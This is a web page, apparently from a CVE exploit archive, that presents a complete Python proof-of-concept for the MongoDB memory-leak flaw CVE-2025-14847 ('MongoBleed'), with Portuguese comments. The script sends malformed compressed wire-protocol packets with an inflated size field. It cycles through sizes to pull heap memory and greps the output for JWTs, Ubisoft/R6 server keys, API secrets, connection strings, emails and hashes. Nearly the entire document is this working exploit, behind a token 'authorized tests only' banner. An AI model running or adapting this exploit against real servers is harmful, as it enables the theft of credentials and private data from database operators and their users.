4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / live_leaker.py PY
#!/usr/bin/env python3
"""
CVE-2025-14847 (MongoBleed) - Advanced Live Leaker PoC
Autor: Equipe de Pesquisa em Segurança
Licença: MIT (Uso Educacional Apenas)

Esta versão avançada testa incrementalmente diferentes tamanhos de documento
para maximizar a extração de dados vazados da memória heap do MongoDB.
"""

import argparse
import socket
import struct
import zlib
import re
import signal
import sys
import time
import json
from datetime import datetime
from typing import Dict, Set, List, Optional
from collections import defaultdict

# Conteúdo BSON padrão: campo int32 "a" = 1
DEFAULT_CONTENT = b'\x10a\x00\x01\x00\x00\x00'

# Padrões de interesse para R6 (mesmos da poc_PT.py)
R6_PATTERNS = {
    "Token_JWT": rb"eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+",
    "Auth_Servidor_R6": rb"R6S_SERVER_AUTH_[A-Z0-9]{32,}",
    "Chave_Analytics_R6": rb"R6S_ANALYTICS_KEY_[a-z0-9]{30,}",
    "Chave_Telemetria_R6": rb"R6S_TELEMETRY_KEY_[a-z0-9]{30,}",
    "Segredo_API_Ubisoft": rb"UPLAY_API_SECRET_[a-z0-9]{30,}",
    "UUID": rb"[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}",
    "URL_MongoDB": rb"mongodb://[a-zA-Z0-9_\-:@./]+",
    "IP_Interno": rb"10\.\d{1,3}\.\d{1,3}\.\d{1,3}",
    "Time_Pro": rb"(W7M Esports|FaZe Clan|Team Liquid|G2 Esports|FURIA)",
    "ID_Partida": rb"match_uuid_[a-f0-9\-]{36,}",
    "Email": rb"[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+",
    "Senha_Hash": rb"[a-f0-9]{32,}",
}


class LiveLeaker:
    """
    Explorador incremental de vazamentos MongoDB
    Testa diferentes tamanhos para maximizar extração de dados
    """
    
    def __init__(self, host: str, port: int, min_len: int, max_len: int, 
                 offset: int, timeout: float, sleep_time: float, verbose: bool = False):
        self.host = host
        self.port = port
        self.min_len = min_len
        self.max_len = max_len
        self.offset = offset
        self.timeout = timeout
        self.sleep_time = sleep_time
        self.verbose = verbose
        
        # Estatísticas
        self.stats = {
            'tentativas': 0,
            'sucessos': 0,
            'falhas': 0,
            'vazamentos_unicos': 0,
            'inicio': datetime.now().isoformat()
        }
        
        # Armazenamento de vazamentos únicos
        self.leaks_vistos: Set[str] = set()
        self.leaks_por_categoria: Dict[str, Set[str]] = defaultdict(set)
        
        # Controle de interrupção
        signal.signal(signal.SIGINT, self._signal_handler)
        
    def _signal_handler(self, sig, frame):
        """Handler para Ctrl+C"""
        print("\n\n[*] Interrompido pelo usuário")
        self._mostrar_resumo()
        sys.exit(0)
        
    def _construir_pacote(self, doc_len: int) -> bytes:
        """
        Constrói pacote OP_COMPRESSED malicioso
        Similar à função original mas encapsulada
        """
        # Blob BSON mínimo
        bson = struct.pack('<i', doc_len) + DEFAULT_CONTENT
        
        # Corpo OP_MSG: flags=0, section kind=0, depois BSON
        op_msg = struct.pack('<I', 0) + b'\x00' + bson
        
        # Comprime OP_MSG interno usando zlib
        compressed = zlib.compress(op_msg)
        
        # Payload OP_COMPRESSED:
        # - opcode original (OP_MSG = 2013)
        # - tamanho não-comprimido alegado (doc_len + offset) <- MALICIOSO
        # - ID do compressor (2 = zlib)
        payload = struct.pack('<i', 2013)
        payload += struct.pack('<i', doc_len + self.offset)
        payload += struct.pack('B', 2)
        payload += compressed
        
        # Cabeçalho wire para OP_COMPRESSED
        header = struct.pack('<iiii', 16 + len(payload), 1, 0, 2012)
        return header + payload
    
    def _receber_mensagem(self, sock: socket.socket) -> bytes:
        """Recebe uma mensagem completa baseada no campo de tamanho"""
        response = b''
        while True:
            try:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                response += chunk
                
                if len(response) >= 4:
                    msg_len = struct.unpack('<i', response[:4])[0]
                    if len(response) >= msg_len:
                        return response[:msg_len]
            except socket.timeout:
                break
        return response
    
    def _analisar_padroes_r6(self, dados: bytes) -> Dict[str, List[str]]:
        """Analisa dados em busca de padrões específicos do R6"""
        resultados = {}
        
        for categoria, padrao in R6_PATTERNS.items():
            matches = re.findall(padrao, dados)
            if matches:
                matches_str = [m.decode('utf-8', errors='ignore') for m in matches]
                matches_unicos = list(set(matches_str))
                
                # Filtra matches que já vimos
                novos = [m for m in matches_unicos if m not in self.leaks_por_categoria[categoria]]
                
                if novos:
                    resultados[categoria] = novos
                    self.leaks_por_categoria[categoria].update(novos)
                    
        return resultados
    
    def _tentar_vazamento(self, doc_len: int) -> Optional[bytes]:
        """Tenta vazar memória com tamanho específico de documento"""
        self.stats['tentativas'] += 1
        
        pacote = self._construir_pacote(doc_len)
        
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            sock.connect((self.host, self.port))
            sock.sendall(pacote)
            
            response = self._receber_mensagem(sock)
            sock.close()
            
            if len(response) >= 25:
                self.stats['sucessos'] += 1
                return response
            else:
                self.stats['falhas'] += 1
                return None
                
        except Exception as e:
            self.stats['falhas'] += 1
            if self.verbose:
                print(f"[!] Erro doc_len={doc_len}: {e}")
            return None
    
    def _processar_resposta(self, response: bytes, doc_len: int) -> bool:
        """Processa resposta e extrai vazamentos"""
        try:
            msg_len = struct.unpack('<i', response[:4])[0]
            opcode = struct.unpack('<i', response[12:16])[0]
            
            # Se comprimido, descomprime; senão usa corpo diretamente
            if opcode == 2012:
                raw = zlib.decompress(response[25:msg_len])
            else:
                raw = response[16:msg_len]
                
        except Exception:
            return False
        
        # Busca por nomes de campo (padrão MongoDB)
        vazamentos_simples = []
        for match in re.finditer(rb"field name '([^']*)'", raw):
            leak = match.group(1)
            if not leak or leak in [b'a', b'$db', b'ping', b'?']:
                continue
            
            try:
                texto = leak.decode('utf-8', errors='replace')
                if texto not in self.leaks_vistos:
                    vazamentos_simples.append(texto)
                    self.leaks_vistos.add(texto)
            except:
                pass
        
        # Busca padrões R6 específicos
        padroes_r6 = self._analisar_padroes_r6(raw)
        
        # Exibe descobertas
        encontrou_algo = False
        
        if vazamentos_simples:
            print(f"\n[+] Vazamento simples (doc_len={doc_len}):")
            for leak in vazamentos_simples[:5]:  # Mostra max 5
                print(f"    └─ Campo: {leak}")
            if len(vazamentos_simples) > 5:
                print(f"    └─ ... e mais {len(vazamentos_simples)-5}")
            encontrou_algo = True
            
        if padroes_r6:
            print(f"\n[!] PADRÕES R6 DETECTADOS (doc_len={doc_len}):")
            for categoria, matches in padroes_r6.items():
                print(f"    [{categoria}] {len(matches)} novo(s):")
                for m in matches[:3]:  # Mostra max 3 por categoria
                    if len(m) > 70:
                        m = m[:67] + "..."
                    print(f"      └─ {m}")
                if len(matches) > 3:
                    print(f"      └─ ... e mais {len(matches)-3}")
            encontrou_algo = True
            
        if encontrou_algo:
            self.stats['vazamentos_unicos'] += len(vazamentos_simples) + sum(len(v) for v in padroes_r6.values())
            
        return encontrou_algo
    
    def _mostrar_progresso(self, doc_len: int):
        """Mostra progresso periodicamente"""
        if self.stats['tentativas'] % 100 == 0:
            taxa_sucesso = (self.stats['sucessos'] / self.stats['tentativas'] * 100) if self.stats['tentativas'] > 0 else 0
            print(f"\r[*] Progresso: doc_len={doc_len}/{self.max_len} | "
                  f"Tentativas={self.stats['tentativas']} | "
                  f"Taxa sucesso={taxa_sucesso:.1f}% | "
                  f"Vazamentos únicos={self.stats['vazamentos_unicos']}", end='', flush=True)
    
    def _mostrar_resumo(self):
        """Mostra resumo final das estatísticas"""
        print("\n\n" + "="*60)
        print("RESUMO DA SESSÃO DE LIVE LEAKING")
        print("="*60)
        print(f"Início: {self.stats['inicio']}")
        print(f"Fim: {datetime.now().isoformat()}")
        print(f"\nEstatísticas:")
        print(f"  - Tentativas totais: {self.stats['tentativas']}")
        print(f"  - Sucessos: {self.stats['sucessos']}")
        print(f"  - Falhas: {self.stats['falhas']}")
        print(f"  - Vazamentos únicos: {self.stats['vazamentos_unicos']}")
        
        if self.leaks_por_categoria:
            print(f"\nVazamentos por categoria:")
            for categoria, leaks in self.leaks_por_categoria.items():
                print(f"  - {categoria}: {len(leaks)}")
                
        print("="*60)
    
    def executar(self, salvar_json: Optional[str] = None):
        """
        Loop principal de exploração incremental
        """
        print(f"\n{'='*60}")
        print(f"[!] MongoBleed Live Leaker Avançado")
        print(f"[!] Alvo: {self.host}:{self.port}")
        print(f"[!] Faixa: doc_len {self.min_len} → {self.max_len} (offset={self.offset})")
        print(f"{'='*60}\n")
        print("[*] Transmitindo apenas vazamentos únicos (Ctrl+C para parar)")
        print("[*] Aguarde detecção de padrões R6...\n")
        
        doc_len = self.min_len
        
        while True:
            # Reinicia ciclo se atingir máximo
            if doc_len > self.max_len:
                doc_len = self.min_len
                
            # Mostra progresso
            if not self.verbose:
                self._mostrar_progresso(doc_len)
            
            # Tenta vazamento
            response = self._tentar_vazamento(doc_len)
            
            if response:
                self._processar_resposta(response, doc_len)
            
            # Incrementa e aguarda
            doc_len += 1
            time.sleep(self.sleep_time)
            
        # Salva resultados se solicitado
        if salvar_json:
            self._salvar_resultados(salvar_json)
    
    def _salvar_resultados(self, arquivo: str):
        """Salva resultados em JSON"""
        resultado = {
            'estatisticas': self.stats,
            'vazamentos_por_categoria': {k: list(v) for k, v in self.leaks_por_categoria.items()},
            'total_vazamentos': self.stats['vazamentos_unicos']
        }
        
        with open(arquivo, 'w', encoding='utf-8') as f:
            json.dump(resultado, f, indent=2, ensure_ascii=False)
        print(f"\n[+] Resultados salvos em: {arquivo}")


def main() -> int:
    banner = """
    ╔══════════════════════════════════════════════════════════╗
    ║  CVE-2025-14847: MongoBleed Live Leaker Avançado        ║
    ║  Exploração Incremental com Detecção de Padrões R6      ║
    ║  AVISO: Apenas Testes Autorizados                       ║
    ╚══════════════════════════════════════════════════════════╝
    """
    print(banner)
    
    parser = argparse.ArgumentParser(
        description="MongoBleed Live Leaker Avançado - Exploração incremental",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Exemplos:
  # Exploração padrão
  %(prog)s --host 127.0.0.1
  
  # Faixa customizada com verbose
  %(prog)s --host 127.0.0.1 --min 50 --max 10000 --verbose
  
  # Salvar resultados em JSON
  %(prog)s --host 127.0.0.1 --save resultados.json
        """
    )
    
    parser.add_argument("--host", default="127.0.0.1", help="IP/hostname do alvo")
    parser.add_argument("--port", type=int, default=27017, help="Porta do alvo (padrão: 27017)")
    parser.add_argument("--min", dest="min_len", type=int, default=20, 
                        help="Tamanho mínimo do doc_len (padrão: 20)")
    parser.add_argument("--max", dest="max_len", type=int, default=32768, 
                        help="Tamanho máximo do doc_len (padrão: 32768)")
    parser.add_argument("--offset", type=int, default=500, 
                        help="Offset do buffer (padrão: 500)")
    parser.add_argument("--timeout", type=float, default=2.0, 
                        help="Timeout do socket em segundos (padrão: 2.0)")
    parser.add_argument("--sleep", type=float, default=0.001, 
                        help="Sleep entre iterações em segundos (padrão: 0.001)")
    parser.add_argument("--verbose", action="store_true", 
                        help="Modo verbose (mostra todos os erros)")
    parser.add_argument("--save", help="Salvar resultados em arquivo JSON")
    
    args = parser.parse_args()
    
    # Validação de entrada
    if args.min_len < 1 or args.max_len > 100000:
        print("[-] Erro: Faixa de doc_len deve estar entre 1 e 100000")
        return 1
        
    if args.min_len >= args.max_len:
        print("[-] Erro: --min deve ser menor que --max")
        return 1
    
    # Executa live leaker
    leaker = LiveLeaker(
        host=args.host,
        port=args.port,
        min_len=args.min_len,
        max_len=args.max_len,
        offset=args.offset,
        timeout=args.timeout,
        sleep_time=args.sleep,
        verbose=args.verbose
    )
    
    try:
        leaker.executar(salvar_json=args.save)
    except KeyboardInterrupt:
        pass
    
    return 0


if __name__ == "__main__":
    raise SystemExit(main())